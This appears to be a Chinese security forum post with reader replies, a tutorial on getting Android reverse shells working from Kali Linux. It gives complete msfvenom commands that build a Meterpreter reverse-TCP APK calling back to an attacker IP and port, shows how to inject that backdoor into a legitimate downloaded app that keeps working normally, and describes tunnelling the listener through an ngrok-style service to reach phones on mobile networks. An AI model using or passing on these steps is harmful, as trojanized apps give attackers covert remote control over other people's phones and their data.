kali下安卓shell填坑
一:生成的Shell得不到反弹常见问题
导致此问题出现最大的原因是网络的问题,手机和kali不在同一网段内。比如手机的ip地址是192.168.1.2kali的ip地址为192.168.1.4也就是说,手机和kali在同一网段192.168.1.1/24
怎么设置:
kali下虚拟机的上网方式默认为NAT模式,我们设置为桥接模式即可!
或者我们的kali连接无线网络,也可以的!
比如该实例中,手机的ip是192.168.0.189 kali的ip是192.168.0.106(记住kali的ip地址,要用!)
生成Shell
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 R > kali.apk
这样我们就生成了一个内网版的安卓Shell!
参数说明:
LHOST :kali的ip地址(不是手机的)
LPORT :kali的内网端口(可以自定义)
kali.apk : 生成Shell的名字
给正常APP添加后门
ps:此方法只适用于没有加壳的app
首先,我们在某平台获取某app
执行下面命令
msfvenom -x sx.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=5555 -o aa.apk
可以看到,和前面的命令相比较,多了一个-x参数。后面跟要添加后门的app名字即可!
当我们运行该APP时,成功得到反弹!
app也正常运行
外网Shell
以上学习仅仅适合内网的渗透测试,那么我们看看如何使用外网的连接!
以前说过,如何利用花生壳制作外网shell的学习,今天我们来看看利用ngrok进行的渗透测试!
我们新增一个TCP协议
如果提示端口占用,试试查看可用端口
然后点击开通
然后获取客户端执行./sunny clientid你的id(具体移步文章 kali制作外网shell)
生成外网Shell
生成外网Shell,其实很重的一点就是我们要知道外网的ip地址。很简单,我们ping下分配给我们的域名即可。
如图,我们得到了我们的外网ip,端口在开通tcp协议时,我们就得到了。直接生成Shell即可。
需要注意的是,我们在配置msf时,填写的参数是我们内网的端口和ip,而不是我们公网的!
切换到4G,成功得到shell
谢谢分享,学习了
讲的很详细!谢谢分享!:kaixin: {:9_311:}
不错!支持下! mjhopen 发表于 2019-7-18 00:50
谢谢分享,学习了
共同学习!!!:shengqi: 共同学习!!!
火焰之剑 发表于 2019-8-5 07:08
共同学习!!!
666:kaixin: 不错,很好可以学习一下 开启payload的命令我都忘了 {:2_25:} 我用在某平台下载的apk,为什么不加壳加码为什么会报错 制作失败?
页:
[1]
2